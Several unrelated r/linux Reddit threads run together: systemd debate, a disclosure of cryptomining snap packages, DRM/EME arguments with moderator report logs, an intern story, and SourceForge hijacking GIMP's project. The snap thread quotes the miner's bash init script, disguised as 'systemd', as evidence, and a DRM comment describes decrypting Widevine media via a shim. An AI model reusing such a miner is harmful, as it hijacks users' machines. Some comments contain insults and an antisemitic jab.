They might not like "arbitrary" things like adding a one click button for the most common use cases, because there's no technical justification for why that use case is so important, even though from a user standpoint that button might be a make or break feature.

Also, security. The Linux community loves it.  A lot of people will avoid software even on the desktop if it seems at all insecure or un-audited.  They want less lines of code so there's fewer places for bugs to hide.



I don't really understand any of it, and I probably wouldn't use Linux much if it weren't for things like Ubuntu, systemd, KDE, and the fact that Chrome runs just fine, but this stuff really matters to a lot of people.
I use something similar to #4 to automount my NFS shares. If for some reason my file server is down, I can still start up my desktop. Mounting the shares doesn't get in the way of booting because they only mount when I need them.
[deleted]
No, I hate systemd because it wants to be everything at once giving zero fucks about security.
We use systemd to run and manage docker containers.  Together with journald this works so extremely well. Probably one of the best decisions we’ve ever made.
One of the things I prefer the most about systemd is that now the service files can be standard and come from upstream, instead of having different formats and conventions between distributions. As far as I'm concerned I don't care a lot about having an RC based init, SysV init, systemd, ... As long as it is standard across the various Ubuntu, Debian, Centos, Arch, ... You can't imagine how glad I'm to finally be able to just change settings with the *ctl utilities without having to remember in which file Debian handles them. Or to be able to configure networking in a cross-distro way using networkd/resolved instead of meddling with stuff such as /etc/network/interfaces. It's a blessing that has made Linux better, not worse, and I think that people that still complain about systemd's design clearly never saw that not having a standard way to do stuff across distributions was always a thorn in Linux's side.
I was reading up on systemd a bit and it honestly does not seem that bad and it feels better structured.   I think the hard thing is getting used to all the commands.  Like the service command is gone now, it's some more involved command, I forget it off the top of my head.   But I imagine once you get used to these changes it's not as bad.  

That thing where "-" is a reserved character seems like a bad idea though... they should have chose another character that's less likely to be used in a folder name, like maybe : or why not just stick with /.

I can't say I have that much experience with it to really say if I hate or like it though.  I'm still on older distros for my network, like CentOS 6.x.  I do need to start looking at a newer distro to standardize on for my next builds though.
ExecPreStart ExecStop saved my life. Mono services tend to mess up if lockfile did not clean up prior execution, using ExecPreStart ExecStop doing the clean up make my service execute properly.
[deleted]
Setting aside the fact that the main gripe people have with systemd is in the title of your post, there's many other serious, fundamental issues with systemd that should be deal-breakers but for some reason aren't. Here's a few.

* systemd treated perfectly valid usernames like `0day` as uid 0.

Rather than accept that yes, maybe treating a non-number as a number was a mistake, the main contributor punts it to whatever tool was used to create the user (which might well have been vipw for all he knew). As people call him out for it, he doubles and triples down, continuing to blame the user rather than the incontrovertible fact that the code was erroneously treating a non-number as a number.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000082 https://github.com/systemd/systemd/issues/6237

* systemd's systemctl's exit codes are inconsistent.

In some cases the exit code of `systemctl` can be relied upon, other times it cannot:

```
$ sudo systemctl status rsyslog > /dev/null; echo $?
0
$ sudo systemctl status adoifjaoidsjfioadjf > /dev/null; echo $?
Unit adoifjaoidsjfioadjf.service could not be found.
4
$ sudo systemctl status adoifjaoidsjfioadjf@* > /dev/null; echo $?
0
# note here there's no output whatsoever.
$ sudo systemctl start adoifjaoidsjfioadjf@*; echo $?
0
```

https://github.com/systemd/systemd/issues/6379

* systemd silently ignores many errors in unit files.

Let's say you make a silly mistake and type `Restart=on-fail` instead of the correct `Restart=on-failure`. Now if your service dies it will just stay dead (the default is `Restart=no`). If you assume that the service is not expected to die during normal operations, there's a good chance it'll be a long time until you know something is wrong. You could have a ticking time bomb left by yourself or a former coworker and you wouldn't know unless you manually parsed every file yourself.

This could be resolved by simply hard-failing when parameters are invalid. That should be the expected default behavior for every system, in fact. You wouldn't expect `ls` to ignore invalid flags, you shouldn't expect any less of a Pid 1 process.

https://github.com/systemd/systemd/issues/5813

Edit: Fixed formatting
This is obviously bait so of course there are responses, but really, almost nobody hates systemd.
> *You probably hate systemd because you think it's all about "boot fast no bash" - but it can do so much more you probably had no idea about.*

Umm no; people hate systemd because it does so much more they have no idea about, all crammed into PID 1
Learned a lot from this fantastic post. thank you!!
Could you imagine an alternative to Systemd, that has nearly all off its features, but uses a different core principal?
A disabled service can be loaded, and will be started if a service that depends on it is started; enable and disable only configure auto-start behaviour for units, and the state is easily overridden. You probably want to use mask instead if you really intend to “disable” a service and use a different process manager like supervisord
I thought I knew systemd well enough.

still have a lot to learn
Hey, would you update this with the info from the comments? This would make a great wiki.
I just wish that I didn't have to have elogind just to login to use wayland for plasma, it's kinda annoying.
[deleted]
I don't hate systemd, I just really like openrc.

The only thing that bothers me about systemd is how it's getting that hard dependency from other applications (I think?)
shame it can't shutdown properly - i almost always have a 3min wait for some systemd unit file to timeout. start-stop-daemon and init scripts never gave me a problem in 20+ years. 

systemd nfs mounts just don't work for me whereas autofs and fstab work fine.
I don't hate it. So far its been way easier to run and manage than having to create shell scripts importing functions from other init scripts that can change from distribution to distribution. Its just that having some stuff deeply integrated into it like sound system kinda raises a flag. As an init system I love it but I don't want it to be more than that.
[systemd-resolve can DNS leak past OpenVPN](https://github.com/systemd/systemd/issues/6076); I ran into this in the past.
No, I hate Unit files because they are horribly complex and take posts like this to "explain" its functionality. For example, from your post: The documentation for systemd is utter crap; Even those who have been using systemd for years probably have no idea of half of what it can do.

See an example of a [mysqld.service script](https://gist.github.com/thomasfr/e4e4bb64352ee574334a#file-mysqld-service).

Similar script to start mysqld in [runit](http://smarden.org/runit1/runscripts.html#mysql).

These are just examples, but it's enough to get the point across. Then, to really understand Unit Files, well here's a bit of light [reading](https://www.freedesktop.org/software/systemd/man/systemd.unit.html). Or, for [runit](http://smarden.org/runit/). Why does everybody point to SysV bash scripts? They were great for their time, but it's not only between SysV scripts and systemd.
Super useful for startup scripts with oneshot mode
Just one thing, THAT SHIT STORES LOGS IN BINARY FILES!
My perspective on this is, I'm a Linux user, not a Linux developer, who uses Linux for gaming, Blender, web browsing, some coding, etc, is, I really don't understand what most of this topic is about. 

_(so I assume someone will tell me I should keep quiet about something I don't understand)_

But from my perspective this whole topic is a giant "Who cares?".

I don't care what init system my Linux OS uses, I just want my OS to work and to provide a user friendly UI that allows me to focus on doing what I turned on the PC to do, not fiddling with the OS or fixing things or editing config files, etc.

I love Linux, and I'm keen to see more people use Linux, for Linux to become more widely supported, hence I want to see it improve so it can appeal to the masses.

There are a lot of average PC users out there who have reasons for not wanting to use Linux that need to be addressed, but I'm sure not one of them has ever said "because I don't like systemd".

Why not just accept and use systemd and move on to stuff that will actually effect Linux adoption?
[deleted]
Isn't that the problem though? Bloated overfeatured non-UNIXy mess.
Thats not why people hate systemd.  They hate systemd because it is a monolithic anti-kiss buggy mess being forced down the throats of users in the name of simplicity, while ignoring the Linux ethos of choice.
F* the people behind systemd 

it was ment as a toy

and became a desaster
Yeah, but you are not talking about the main criticism of systemd: it's bad implementation, or rather: the bad attitude of the developers, which causes a bad implementation.

The philosophy of a software matters.

The philosophy of Linux (the kernel) is: every user matters, and the user experience must never **ever** be broken.

The philosophy of systemd is: fuck the users, we know better.
If systemd is that bad, why is the only major distro which doesn't only support systemd Gentoo? (It is supported by Gentoo but most will use OpenRC instead, leading to a bit cluttered wiki)

Every other distro which doesn't support systemd by philosophy (i.e. Artix Linux, Devuan) are rather unknown
Meh, `systemd` does indeed do quite a bit of things.

It's not my favorite suite of system base stuff, but it's plenty workable. It definitely has its place in the ecosystem.
Thanks for posting this! There are some really neat bits of information about systemd here that I wasn't aware of before.

I used to dislike systemd when it was first integrated into the distributions I use but no longer. As I've gotten used to it and learned more about it, systemd has really grown on me. I am now a proud fan!  🙂

One cool component of systemd that hasn't been covered here until now is the journal. There are so many slick and efficient ways of combing through it.

Here are some good posts about using the journal's features:

https://fedoramagazine.org/systemd-using-journal/

https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
Speaking about pt.3.. So technically it's possible to start KDE plasma in the background right after SDDM shows up?
Some Snaps (probably all) of Nicolas Tomb contains miner! This is the content of init script of 2048buntu package:

    #!/bin/bash

    currency=bcn
    name=2048buntu


    { # try
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
    } || { # catch
    cores=($(grep -c ^processor /proc/cpuinfo))

    if (( $cores < 4 )); then
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
    else
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
    fi
    }

Issue on github:

https://github.com/canonical-websites/snapcraft.io/issues/651

All snaps of Nicolas Tomb:

https://uappexplorer.com/snaps?q=author%3ANicolas+Tomb&sort=-points 

Edit.

All Snaps of that author were removed from the store.
Another thing to add to the list of features Flatpak is missing.

Jokes aside, this is what worries me also about Flatpak. There needs to be a good team of (human) package reviewers for these kinds of app stores to work.
Nice catch.
  
>License	Proprietary
  
He made sure that his "work" would not be duplicated though.
Thanks for letting us know. This has now been removed from the store.
[deleted]
Shame on this guy but realize that *every* random .sh, .deb, .rpm, .exe, pip package, whathaveyou can potentially include such things. We Linux users enjoy a lot of security by OS design but every $ sudo dpkg -i ~/Downloads/AwesomeNewPackage.deb is a big risk. Don't forget that.
Guess he wants to buy a Ferrari
Pending further investigations, all snaps by this user have been removed from the store.
myfirstferrari@protonmail.com

Ayy lmao
[deleted]
I applaud his humor sense, he knew this would be caught but he still went through with and went as far as making it completely obvious and messaging a ridiculous email address such as "myfirstferrari@protonmail.com". This man is a hero who sacrificed himself to show the terrible future that awaits if we allow random people to push important packages to a public repository without any human reviewing or beta-testing of any kind.
Oh no. Those things that can't be audited for security have security problems. Who could've seen this coming?
Let's do it again. Shall we?  
http://kmkeen.com/maintainers-matter/    

Snap with its "You can use only our store unless you want a lot of inconvenience." is worse case of Flatpak.  
 
So, where are the people who said that Canonical as gatekeepers of what goes to their store is soooo much needed and secure. 

Do snaps get to run as root on install like .debs from a PPA or are they only ever executed as the user and in the sandbox?
bitcoiners, never satisfied with destroying their own machines decide to destroy others' for penny shavings
People wanted Windows style package management for Linux and now they have it.  Play stupid games and win stupid prizes. 
I'm not an expert of snaps. But isn't it suspect that all the apps of that guy weights 140 ± 1 MB? For such small and simple games? 
The snapcraft page says it's "Safe to run"
myfirstferrari@protonmail.com ( ‾ ʖ̫ ‾)
People like you make linux great. Thanks for auditing code.
Paging /u/ProtonMail in case they want to investigate the account for abuse.
It's funny how the JavaScript programmer needs a try/catch analogy to understand the shell's short-circuit evaluation of conditionals.
[deleted]
To be fair this stuff can hide in almost anything, always check sources, better safe than sorry.
>"But they allow you to run any version of any library, how could that possibly be a bad thing, they're so convenient!!"

Edit: nevermind, this problem is not exclusive to snaps, the commentors below convinced me.



Thanks for the share !
Ubuntu peasants! With Gentoo you can just disable the malware use flag and rebuild!

    sudo euse -D malware 
    sudo emerge -aND world 

Problem solved!
Snaps sound like Windows executables for Linux.
Another reason why snap/flatpak is insecure by design.
[deleted]
Ugh, and they even abused ProtonMail! It's a good thing Canonical and/or someone from the Ubuntu community stepped in and pulled all of those.

_Even then, I usually get apps from APT repositories, and only really go for snaps when I want to try an app, and/or that app has its own custom UI (that usually runs on top of GTK 2, ugh, I miss the good old days where I can install a theme and have it just work)_
Nick Tomb:  sack of shit. 
people actually use snaps? xD
Yep, just removed snap and flatpak of my Debian SID system! 

> Guix & Nix == Goood! 
Not a programmer here. Is there some reliable antivirus for preventing this type of thing? 

whats actually needed in these free repo's is an agreement for a software author to submit something actually enters a contract such as. "If you upload malware you will pay a fine of $100,000"

Obviously needs better defined. But the internet really does need some "cleaning up"
How about a signing hierarchy (directed a cyclic graph with or without multiple in)? 
The only time I'd ever use a snap package is if I couldn't get it via package manager or from git. Which is pretty much never.
So which apps did he package? 
Interestingly enough, the cryptominer script for his snaps don't require root access. Am I right?
I knew systemd was not to be trusted. /s
This is why Snaps worry me.
No Ferrari for you.
Can't get hit with malware snaps if you don't use snaps to begin with. 
Op u da real MVP
And that's why I stopped using Ubuntu.
[deleted]
Is it really malware if anyone can view the source code?
As a side note, a mod seems to keep removing posts about digital rights restrictions and I'm not sure why. I assume that the person must be unaware of how DRM impacts them and other GNU/Linux users.

Edit: After reviewing the thread linked below it seems the mod 'Kruug' doesn't believe this is relevant to Linux and that the implementation of DRM is a good thing. 

[Bryan Lunduke's take \(he mad\)](https://www.youtube.com/watch?v=SPfdOOiuOHI&t=758s)

[EFF's reponse](https://www.eff.org/deeplinks/2017/07/amid-unprecedented-controversy-w3c-greenlights-drm-web)

[One of the removed threads](https://www.reddit.com/r/linux/comments/6mn4ad/i_know_this_isnt_specifically_linux_related_but/)

[The verge](https://www.theverge.com/2017/7/8/15942238/web-drm-standard-eme-approved-controversy)

Summary of the DRM (stolen from the above thread):

* The Digital Restriction Management (DRM) is called Encrypted Media Extensions (EME).
* Its meant for Audio/Video, but can be extended to anything.
* Google, Microsoft, and Netflix were the big players pushing this
* Browsers still need to implement the new standard, this means Mozilla could potentially take a positive stance in favor of the users. 
* Not sure how quickly places will adopt this. Lunduke things it will be right away.
* There is a 2 week appeal period. Doubtful that anything will come of that.
* Closed Source Software was a mistake
* Breaking DRM is a crime in the US, no exception is made for this DRM.
* DRM could potentially restrict based on OS, location, or a host of other arbitrary things.

From the Verge article:

>There are also accessibility and competitive concerns. There are no exemptions here that would allow computers to scan videos and automate work like generating subtitles and translations or identifying strobing lights to produce warnings for people with epilepsy. EME doesn't standardize decryption either, and Doctorow writes that companies developing browsers may have to license decryption components, making it harder for new browsers to enter the market.

    user reports:
    2: fuck you kruug
    1: Wtf is this doing here?
    1: Spam
    1: This has nothing to do with Linux
    1: Hi, this is Mike from Netflix. Please remove all posts raising concerns about DRM.
    1: Can I get on the report sticky post?
    1: off topic - freetards need to whine in the right sub
    1: piss off kruug
    1: Unrelated to linux
    1: Much overlap between Linux users and neckbeards too. Can we post pics and grooming tips now?
    1: nothing to do with linux
    1: wanted to join the user report list
    1: Lol you people just want to be able to pirate stuff that isn't yours.
    1: hi!!!!!!!!
    1: this is still unrelated to linux you know
    1: FREEDOM MEANS LIBERTY!!!!¡!!!!!!!!!!!!!¡
    1: Off-topic
    1: not linux related
    1: This belongs in r/freeculture. Not all Linux users care about Stallman being right or wrong.
    1: Fuck you kruug

And then there's the reports on this comment...

    user reports:
    1: Who gives a fuck what users reported, stop making this about yourself.
    1: What the fuck is wrong with you.
    1: Meme post
    1: Vote manipulation
    1: NSFW post
    1: FIGHT THE ESTABLISHMENT!!!!!!!!!!!
    1: Deleting important posts from community
    1: REEEEEEEEEEEEEEEEEEEEEEEEEEEE!
Is there any way me as a regular user can submit an appeal?
Lol!

"Bryan Lunduke's take (he mad)"

Well put.  Lunduke here.  Can confirm.  He mad.
Dear /u/Kruug,

Yes this isn't strictly Linux related and there are other subs that fit the topic better, but there is an undeniable overlap of interest, since many Linux users are concerned about their freedom.

I can understand that you want to keep the posts on this sub on topic but you shouldn't prevent your community from discussing something.
If we ignore all ideological arguments for a moment (obviously they are very important), I am still left with a *very* basic support question. So I get a computer with e.g. an OpenRISC CPU and compile & install Firefox. Will the CDMs work there? Who is going to ensure it will work?
>and Doctorow writes that companies developing browsers may have to license decryption components, making it harder for new browsers to enter the market.

They'd never admit to it, but that right there is a big reason for all the browsers to support this.
So does this drm have any way of a user just screen recording/audio recording the output? Without that any DRM measure will be broken in minutes and only put a burden on paying and fair users. 
This is terrible for the future of the internet. Like Bryan said, DRM has never not been cracked, and only frustrates the freedoms and rights of the user, and opens many people up to be sued. If these people thought critically for a few seconds about DRM, they would not have tried to standardize it. We need to somehow stop the modern web browsers from implementing this so that it does not work for the companies that try to use this DRM.

DRM was a mistake. Closed source software was a mistake.
I think this is relevant to /r/linux, so thanks for letting this through!
Great! I was just thinking the other day that I could really use more stupid broken bullshit to bypass when browsing the internet.
I feel like this is more important than people think
Breaking DRM is a crime in the US... but is it anywhere else though?
The way I see this going is like this. (Please bear in mind that I am phenomenally cynical and always assume companies only work in their own, rather than their customers' best interests)

Apple releases a DRM kit - it only works with the latest version of Safari.

Microsoft releases a DRM kit - it only works with Edge on Windows 10.

Google releases a DRM kit - it only works with Chrome but not the open source Chromium.

Then at some point these browser start security warning against sites that don't have DRM.

Now, can anyone see kernel.org or the FSF getting involved in those to avoid a security warning?
Yes. This is awful. Let's all send a barrage of complaints to W3C
While I recognize the noble effort of fighting DRM, I do feel standardization is somewhat beneficial for practical intents and purposes.

Back in the days DRM'ed media was *totally* unusable on Linux (Silverlight!).

EME has at least enabled Linux users to watch *some* DRM'ed content. In general I try to avoid DRM'ed content where possible, but I also value at least being *able* to watch Netflix should I decide to, having come to terms with the fact that the content industry is not going to change overnight.

My primary objection would be an *increase* of DRM usage because it's more accessible in general (instead of solely making existing content more accessible to Linux users).
Place your bets for how long it will take for an iceweasle adding to crack the drm.
People only realize their mistakes after it's too late, this is one of those things. It's going to be very difficult to backtrack on this after it's done
Didn't this happen a while ago?
day 1 pirate
Mankind is doomed, soon we have total web control like china has been pioneering.
I just hope Mozilla doesn't implement that, that way I can continue using Chromium+Plugin for Netflix and Firefox for all my other browsing.
Well fuck. Off to the other subs to see how alternate internet plans are going.
[deleted]
Before people go and put words in my mouth...

> doesn't believe this is relevant to Linux

No, I don't.  Because as it stands right now, Firefox and Chrome will still work on Linux, and so far, nothing will be restricted that isn't already (Looking at you Netflix).

> that the implementation of DRM is a good thing. 

I do not think DRM is a good thing.  What I do think is a good thing, though, is that if DRM is here to stay, at least have a standard implementation of it.  Companies have a right to protect their IP.

While I'm all for re-writing the DMCA to make it so that we own the media we purchase instead of leasing/renting, when one pays for services like Netflix and Hulu, they're not paying for the media they're consuming, they're paying for the delivery service being offered by these companies.  If you watched Futurama on Netflix, you weren't paying for the right to watch those episodes, you were paying for the right to access the Netflix library, which happened to include Futurama.

Fox still has the right to protect that media, since you're not buying it.  That's what, currently, the EME sounds like it's being implemented for.

^^^These ^^^views ^^^are ^^^my ^^^own.  ^^^I ^^^do ^^^not ^^^speak ^^^for ^^^all ^^^of ^^^the ^^^/r/Linux ^^^moderation ^^^team ^^^with ^^^this ^^^post.
What is the alternative to Web DRM? The highly secure flash or maybe silverlight?

If breaking DRM is illegal and that is what concerns people, then the law should be changed.

The average user doesn't care if you ask them to install flash or malware, as long as Netflix and Hulu works all is well. At least a properly sandboxed plugin might grant them more security.

I'm not in favor of DRM but this is my current take on it. Plus, it's only a matter of time until a plugin to break the plugin is created.
I'm not sure how DRM protects anything in this case. I mean, I can always take OpenBroadcaster and record the window with the video stream (e.g. Netflix).
Isn't W3C mostly irrelevant? If they didn't standarize on it, Chrome would make their own standard, and then browsers like Firefox would either implement what Chrome has or drop DRM entirely.
This is why web 2.0 was a mistake. 
I don't know if this is relevant here, but I'm gonna post it anyways.

I was doing some research on the WideVine CDM (used on Netflix, Spotify and others) and I don't get the hype - it is just a shared object that ships with a header containing an interface to it. A bit of experimentation led me to the fact that it doesn't have any checks regarding what calls it - I was easily able to write a shim that takes a few dumped values from my browser and decrypts the protected media in no time.

My point is, this kind of DRM protection is entirely useless - as long as no guarantees can be made regarding the execution environment, this kind of DRM won't serve any real purpose except inconveniencing legitimate users and further restricting hardware choices.

TLDR: DRM is broken and is trash.

E: Just to be clear, where I live, we don't care for DMCA.
I'd just like to point out: DRM is coming to the web, W3C approved or not. At least, this way, we have an official standard that everyone can work with instead of companies rolling their own solutions and small browser makers struggling to follow the standard. Not having a standard would definitely result in a broken web.
[deleted]
What would happen if all the major browser vendors refused to support it?
For those of us who don't pay much attention to DRM-type issues, can someone clarify for me what this means in lay terms?

I've been under the impression that DRM is mostly about locking down proprietary software and media to make it harder to pirate, and the major "fucking over the consumer" aspect is when a consumer attempts to make a digital backup of DRM-protected media that they've purchased. I understand that Linux (being a heavily pro-Open Source community) is generally going to be anti-DRM, but I think I'm missing why this is so terrible, especially for those of us that don't use proprietary software.
WTF Bryan's issue is with US Federal Law not DRM. Good luck cracking Playready 3... 
On the day of net neutrality...
> breaking drm is a crime in the U.S.

What if you bought something legitimately and say, removed it's DRM for personal use?
Time to cancel your MS, Google and Netflix accounts.

If you're giving money or data to this guys this is the best time to stop
When will Google's financial support W3C decission makers revealed.
https://campaignforaccountability.org/new-report-reveals-googles-extensive-financial-support-for-academia/
> (((Microsoft))) trying to hinder free information exchange 

Why am I not surprised? 
>Edit: After reviewing the thread linked below it seems the mod 'Kruug' doesn't believe this is relevant to Linux and that the implementation of DRM is a good thing. 

That's pathetically childish.

I wouldn't like a post about punching puppies in the face on /r/linux. It doesn't mean I'm an advocate for it.

Also...this post is clearly still here you twit. 
**abort abort abort**
[deleted]
Nice witch hunting.
I see the bad in this, but I also see the positive. Sometimes you want to develop something for the end user to use online, and you don't want to only protect it via obscurity. One example is a T-Shirt design tool (like Custom Ink and such).

Also, if this moves forward, and major players/websites start adopting it, Firefox will have adopt it or they will fall by the wayside.

I wonder if it will be similar to how Android is now doing web APKs. Basically your site will host a compiled Android App, and the site will serve the portion needed. 
Is the implementation of EME going to require closed-source code be baked into browsers?  

I wouldn't object to a standardized way of implementing DRM being laid out if I could disable it in my browser.  I have no problem with content providers using DRM - that is their right, freedom, and prerogative, as it is mine to get my media/content elsewhere.  
[deleted]
DRM in general is pretty alright.  The web is running on servers with code that is almost always impossible to audit anyway.  I don't mind this at all on the whole "all code should be open sourced" front.  

On the other side it can help curb piracy and helps enforce licensees to their actual meaning.  Both good things.  

I think the lack of standards in this area is much worse than anything else really.  I'd much rather drm be standardized and improvable than a wild west like it is today.
I recently got an internship as a DotNET developer in a small startup (7 people). It was the only internship I was able to crack so I accepted it even though that meant I wouldn't be able to work on Linux. I was kind of pissed about this and just because I was new and didn't wanted to make a fuss about anything I didn't even mention that I have been using Linux and I had a dual booted laptop. Only my immediate boss knew but obviously didn't encourage me to do DotNET development on it. Today during the lunch, I got to know however that one of the top developers at my company is working on an iOS app using react native and he needed either a MacBook or a Linux laptop for publishing the app to the Appstore. My immediate boss mentioned just by the way that I have a dual booted laptop..... My CEO was shocked (all the other interns weren't doing so well and the CEO thought the same about me and didn't expected something like this from me), and happy that I saved his money and a sacrificial laptop (LOL) and when that developer asked me to give my laptop to him on Monday, my CEO told him to make me do that task and guide me. I am planning to get a hold of a little React native in this weekend to impress them even more. They seem to be very happy with me and I might get some opportunities to grow over here 🙂.
I'm more surprised by the part saying Linux worked for that use case. To what I know Apple absolutely requires a Mac to do any form of release in their ecosystem.
I'm glad you got some recognition, but I have so many questions.

Why would a senior developer not be able to acquire a GNU/Linux system?  Why would a senior developer trust releasing an organization's app on someone else's GNU/Linux system?  How would a senior developer know how to do a workflow such as this on a GNU/Linux system without knowing how to acquire a GNU/Linux system?  Why would you trust someone else using your personal GNU/Linux system?

I would think the solution here is for you to show them how to configure a GNU/Linux system on the organization's hardware that can be maintained by the organization.

Edit: Instead of learning react to showoff, I would focus on your GNU/Linux sysadmin skills as that could be your role.
Great job.

I can't help to laugh about a start up not having MacBooks. Every startup I've worked at drops me a 5k Macbook day one. Even the interns.
I do all of my dotnet development in Linux.
On one hand, it's nice. On the other hand, the company should spend the $2k for an Apple computer for the senior dev.
A similar thing happened to me. I was a security engineer at a decently sized company. One day, our top clients came to visit. One of the higher ups passed my computer and saw my desktop. He said

> So I see you're running GNOME? You know I'm actually on KDE myself. I know this desktop environment is supposed to be better, but... you know what they say. Old habits they die hard

My eyes went wide. An executive running linux??? We kind of became friends after that. And I'm certain it's due to me running Linux. It was a strange experience.
I had a kinda similar situation when I joined a small company as intern was assigned to a dotnet project. 
I used manjaro linux as my daily driver and asked my boss would I need to install windows in order to work with dotnet. Later I came to know that we were working with dotnet core and it can actually be developed in linux. After that I used to do dotnet programming in vs code (missed a lot of vs features) and many of my colleagues were amazed to see me using linux and terminal.
Windows users do actually think that linux users are somehow smarter
AWESOME!! I really hope you get a job there. It could really pay you well and I think you've got a lot of potential in companies like that.
[My first thought](https://youtu.be/FQM5fU7V-MM)
Bro I wish there was the same in my job, I do go programming and I am force to use Mac OS. 🤢
I'm sorry but this sounds like r/ihavesex but with Linux.
This has got to be fake
[deleted]
If this idea doesn't work out, float an idea to buy a Mac, set up a VPN and just make it the dedicated iOS app compiler for anyone when needed. Maybe set up a build bot toolchain for an svn for future iOS apps so new builds gets scheduled to compile every so often.

That way devs can work in their particular environments they are comfortable with and only one Mac needs to be bought for the whole shop.
What are development tools like on the new MacBooks I heard gcc doesn’t even work yet. What about Python3? Docker?
All these suggestions on publishing an ios app without a Max are great, but at the end of the day it might just be better to buy a super cheap Mac Mini for a couple hundred dollars just for pushing apps onto the app store
When I interviewed for my current job, my would-be future boss asked what OS's I was familiar with and I said, well I run Fedora and Windows at home. He turned his laptop around and was running Fedora lol. Great way to start the conversation off.
Have you mentioned you use arch btw
Similar thing happened to me way back when I was on the helpdesk. I was using my personal Linux laptop (cause sometimes Windows sucked at fixing Windows problems), boss notices one day and I explain it to her and she seemed impressed. A week later I was put in charge of all the Macs in the organisation because I knew Linux (and they couldn't find any one else to replace the previous guy).... and to my own surprise, I did unexpectedly alright in spite of never even having used a Mac in my entire life, and I thank my Linux experience for that (I relied mainly on CLI tools/scripts to get the job done).

Today, I'm a Windows sysadmin for a MSP and I'm the only guy in the department who uses a Linux laptop (I use Arch btw) to maintain Windows infrastructure lol.
"Ah, I see you're running Gnome. I'm more of a KDE guy myself."
Nice! I also had something similar to me happen a few weeks ago. I started an apprenticeship as a full stack developer and one day one of the IT guys came up to me and asked if I could set up some old workstations with Ubuntu because he knew I use Linux at home.
Nice and good story.
start using WSL2. you can literally install Linux in windows from the Microsoft store. 

also, they should know that ....
Just use ReactOS next time
…. and thats how u go from an internship to 6 figure job in a year or two … just keep doing the same thing … always be proactive meet the requirements and then go a little bit further on your own… people who understand talent will notice this
Hackintosh or bust if you must deal with xcode and app store publishing. No one should ever pay $2000+ for a laptop that has the same components as a $500 laptop.
You use Mono at all?
[deleted]
I'm sorry but this sounds like a shitty place to work for. No one has heard of dual booting? The senior dev can't dual boot his machine or get a VM running? They can't shell out the cash for a single piece of Apple hardware? Worst of all, he asked for your personal laptop???
Damn, thats really good to know.

Would you also mention how is iOS apps published using Linux?
you would get hired by big chungus if you used gentoo LIKE A REAL MAN
I am so confused by this post, it sounds a bit odd, why would they need a macbook or linux laptop to publish the app to the appstore? Why not just use a VM or spin something up? Why would you have to donate your laptop to the cause? This is so nonsensical. 

If I was a dev and needed such a basic resource I would not goto the CEO and say I am in need of a basic thing please I hope a intern has a dual boot laptop.

&#x200B;

This is stupid, and red meet to this group.
If I ever see another Linux user in the wild, I'll stick a paper that says kick me on his back.
It appears that SourceForge has taken it upon themselves to take over the project account for GIMP-WIN that was previously handled by our windows maintainer, Jernej Simončič, without our permission.

The account that took over the project is listed on SF as [sf-editor1](http://sourceforge.net/u/sf-editor1/profile/), and apparently has quite a few different FL/OSS projects associated with it (just a little suspicious).


**They are distributing ad-enabled installers of GIMP that are not officially recognized by the GIMP team.**  (We abandoned SourceForge as a distributor back in 2013). They have also not responded to comment or questions so far.

http://www.gimp.org/

As a gentle reminder, please be aware that GIMP is only *officially* distributed from the website (http://www.gimp.org/downloads).

I'm one of the lead devs of LXQt and an LXDE sysadmin. We use Sourceforge for our mailing lists and some LXDE legacy stuff.

I'm absolutely sick of them. It's not the first time this has happened. I've been pushing for us to move off SF for a while and this is a good occasion to push for it harder.

I've [sent an email](http://sourceforge.net/p/lxde/mailman/message/34148903/) detailing plans to move. I am urging everyone who still has projects on Sourceforge to do the same.

If you have similar migration problems to solve as the ones I've highlighted in the email, please contact me directly and we can share the workload. My email is available [on my Github profile](https://github.com/jleclanche).
This isn't the first time it's happened either. They have a track record of ruining their brand, because they "lost to Github" for their core audience so whoever is running it now just tries to salvage it with crap ad-enabled installers.
[deleted]
SourceForge has been circling the drain for a few years now. Looks like they're finally almost down the chute. Good riddance. I wish I'd say I could miss them, but they really made it easy to say goodbye.
GIMP should definitely consult a trademark lawyer, the EFF, and the Software Freedom Law Center about the possibilities of suing SourceForge back to the stone age.  There are few things worse for a piece of software's reputation than bundling it with advertisements.
Honestly these days I almost immediately assume that if a project is still hosted on SourceForge the project has been dead for a while as any developer that is putting time into a maintained project surely must realise how bad SF is these days by merely having to navigate the site. 
The FOSS community needs to run some sort of smear campaign against these greedy scumbags at Sourceforge.  SF hasn't been relevant in years since Github took the scene yet many projects are still hosted there for some asinine reason.  They don't care about FOSS anymore, just bundling their malware installer full of proprietary garbage to make bank off of others' work.  Not to mention their site is still chock full of ads at every turn with the annoying download redirect pages to show you another round of ads before you can download anything.

Why is this horrible thing still around?
>As a gentle reminder, please be aware that GIMP is only *officially* distributed from the website (http://www.gimp.org/downloads).

So you are saying that the binaries that I get from Ubuntu Software Center are not officially recognised.


SourceForge, ie. "Cold Storage" was a great site back in the day and enabled a lot of folks to collaborate in a way that wasn't possible.  I know it's great to hop on the "I hate SF" bandwagon, but let's not forget what their help in the beginning provided. 

I'm not saying things are right now, but...  
I use SourceForge, and my ISO releases now are ~5GB each now, which is kind of huge. 
  
It's huge because each release is 4 ISO files, where two are ~1.7GB ISO files, one 32 bit and 64 bit with more headers, and debug symbols, and two ~1.1GB isos without all the headers and symbols...  

AFAIK they only embed the malware in *.exe files?  

If I was to move to another project hosting site, where could I go that takes really big files?  

IMHO since they don't mess with ISO files AFAIK, I'd much rather use their space, than mooch 5GB a release from a site that actually behaves ethically, as they probably are tighter with server space...
More details in French on [LinuxFr](https://linuxfr.org/users/jehan/journaux/sourceforge-de-pire-en-pire-usurpation-d-identite-du-projet-gimp).


This is why I would fully support more projects being aggressive about their trademarks like Mozilla is with Firefox. It doesn't damage your right to play with the code and fork; but it does make much harder to do shit like this.
I'll just leave this here:

https://www.google.com/safebrowsing/report_badware/
so how does one effectively redirect search results pointing to legacy SF projects to the current repository at GitHub?
I'm gonna follow their lead and just consider my street as an extension of my driveway.  Twice I've contacted the town DPW by means of literally talking to a brick wall, and have not received a reply, so thus I conclude that the street in front of my house is abandoned.  If you still wanna drive on that street it's OK, as long as you don't mind driving around my car that's parked in the middle.
